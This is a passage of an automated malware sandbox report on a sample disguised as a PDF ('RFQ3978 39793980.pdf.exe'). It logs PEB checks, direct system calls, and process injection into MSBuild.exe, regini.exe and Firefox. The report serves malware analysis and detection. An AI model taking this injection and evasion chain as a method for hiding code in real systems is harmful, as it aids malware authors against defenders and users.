                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B678E mov eax, dword ptr fs:[00000030h]5_2_011B678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C47A0 mov eax, dword ptr fs:[00000030h]5_2_011C47A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011107AF mov eax, dword ptr fs:[00000030h]5_2_011107AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111C7C0 mov eax, dword ptr fs:[00000030h]5_2_0111C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011907C3 mov eax, dword ptr fs:[00000030h]5_2_011907C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011147FB mov eax, dword ptr fs:[00000030h]5_2_011147FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011147FB mov eax, dword ptr fs:[00000030h]5_2_011147FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119E7E1 mov eax, dword ptr fs:[00000030h]5_2_0119E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011327ED mov eax, dword ptr fs:[00000030h]5_2_011327ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011327ED mov eax, dword ptr fs:[00000030h]5_2_011327ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011327ED mov eax, dword ptr fs:[00000030h]5_2_011327ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152619 mov eax, dword ptr fs:[00000030h]5_2_01152619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E609 mov eax, dword ptr fs:[00000030h]5_2_0118E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112260B mov eax, dword ptr fs:[00000030h]5_2_0112260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112260B mov eax, dword ptr fs:[00000030h]5_2_0112260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112260B mov eax, dword ptr fs:[00000030h]5_2_0112260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112260B mov eax, dword ptr fs:[00000030h]5_2_0112260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112260B mov eax, dword ptr fs:[00000030h]5_2_0112260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112260B mov eax, dword ptr fs:[00000030h]5_2_0112260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112260B mov eax, dword ptr fs:[00000030h]5_2_0112260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01146620 mov eax, dword ptr fs:[00000030h]5_2_01146620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01148620 mov eax, dword ptr fs:[00000030h]5_2_01148620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112E627 mov eax, dword ptr fs:[00000030h]5_2_0112E627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111262C mov eax, dword ptr fs:[00000030h]5_2_0111262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112C640 mov eax, dword ptr fs:[00000030h]5_2_0112C640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01142674 mov eax, dword ptr fs:[00000030h]5_2_01142674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D866E mov eax, dword ptr fs:[00000030h]5_2_011D866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D866E mov eax, dword ptr fs:[00000030h]5_2_011D866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A660 mov eax, dword ptr fs:[00000030h]5_2_0114A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A660 mov eax, dword ptr fs:[00000030h]5_2_0114A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01114690 mov eax, dword ptr fs:[00000030h]5_2_01114690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01114690 mov eax, dword ptr fs:[00000030h]5_2_01114690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011466B0 mov eax, dword ptr fs:[00000030h]5_2_011466B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114C6A6 mov eax, dword ptr fs:[00000030h]5_2_0114C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0114A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A6C7 mov eax, dword ptr fs:[00000030h]5_2_0114A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011906F1 mov eax, dword ptr fs:[00000030h]5_2_011906F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011906F1 mov eax, dword ptr fs:[00000030h]5_2_011906F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E6F2 mov eax, dword ptr fs:[00000030h]5_2_0118E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E6F2 mov eax, dword ptr fs:[00000030h]5_2_0118E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E6F2 mov eax, dword ptr fs:[00000030h]5_2_0118E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E6F2 mov eax, dword ptr fs:[00000030h]5_2_0118E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01108918 mov eax, dword ptr fs:[00000030h]5_2_01108918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01108918 mov eax, dword ptr fs:[00000030h]5_2_01108918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119C912 mov eax, dword ptr fs:[00000030h]5_2_0119C912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E908 mov eax, dword ptr fs:[00000030h]5_2_0118E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E908 mov eax, dword ptr fs:[00000030h]5_2_0118E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A892B mov eax, dword ptr fs:[00000030h]5_2_011A892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119892A mov eax, dword ptr fs:[00000030h]5_2_0119892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4940 mov eax, dword ptr fs:[00000030h]5_2_011E4940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01190946 mov eax, dword ptr fs:[00000030h]5_2_01190946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B4978 mov eax, dword ptr fs:[00000030h]5_2_011B4978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B4978 mov eax, dword ptr fs:[00000030h]5_2_011B4978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119C97C mov eax, dword ptr fs:[00000030h]5_2_0119C97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01136962 mov eax, dword ptr fs:[00000030h]5_2_01136962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01136962 mov eax, dword ptr fs:[00000030h]5_2_01136962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01136962 mov eax, dword ptr fs:[00000030h]5_2_01136962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0115096E mov eax, dword ptr fs:[00000030h]5_2_0115096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0115096E mov edx, dword ptr fs:[00000030h]5_2_0115096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0115096E mov eax, dword ptr fs:[00000030h]5_2_0115096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011989B3 mov esi, dword ptr fs:[00000030h]5_2_011989B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011989B3 mov eax, dword ptr fs:[00000030h]5_2_011989B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011989B3 mov eax, dword ptr fs:[00000030h]5_2_011989B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A0 mov eax, dword ptr fs:[00000030h]5_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011109AD mov eax, dword ptr fs:[00000030h]5_2_011109AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011109AD mov eax, dword ptr fs:[00000030h]5_2_011109AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A9D0 mov eax, dword ptr fs:[00000030h]5_2_0111A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A9D0 mov eax, dword ptr fs:[00000030h]5_2_0111A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A9D0 mov eax, dword ptr fs:[00000030h]5_2_0111A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A9D0 mov eax, dword ptr fs:[00000030h]5_2_0111A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A9D0 mov eax, dword ptr fs:[00000030h]5_2_0111A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A9D0 mov eax, dword ptr fs:[00000030h]5_2_0111A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011449D0 mov eax, dword ptr fs:[00000030h]5_2_011449D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DA9D3 mov eax, dword ptr fs:[00000030h]5_2_011DA9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A69C0 mov eax, dword ptr fs:[00000030h]5_2_011A69C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011429F9 mov eax, dword ptr fs:[00000030h]5_2_011429F9
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe; Process token adjusted: Debug
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtTerminateThread: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: NULL target: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: NULL target: C:\Windows\SysWOW64\regini.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe; Section loaded: NULL target: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe protection: read write
                Source: C:\Windows\SysWOW64\regini.exe; Section loaded: NULL target: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\regini.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe; Thread register set: target process: 3520
                Source: C:\Windows\SysWOW64\regini.exe; Thread APC queued: target process: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe; Process created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: shazRxxmQwU.exe, 00000006.00000000.2274651424.0000000000F40000.00000002.00000001.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000006.00000002.3560644981.0000000000F40000.00000002.00000001.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000000.2427253130.00000000018A1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                Source: shazRxxmQwU.exe, 00000006.00000000.2274651424.0000000000F40000.00000002.00000001.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000006.00000002.3560644981.0000000000F40000.00000002.00000001.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000000.2427253130.00000000018A1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
                Source: shazRxxmQwU.exe, 00000006.00000000.2274651424.0000000000F40000.00000002.00000001.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000006.00000002.3560644981.0000000000F40000.00000002.00000001.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000000.2427253130.00000000018A1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
                Source: shazRxxmQwU.exe, 00000006.00000000.2274651424.0000000000F40000.00000002.00000001.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000006.00000002.3560644981.0000000000F40000.00000002.00000001.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000000.2427253130.00000000018A1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe; Queries volume information: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe VolumeInformation
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
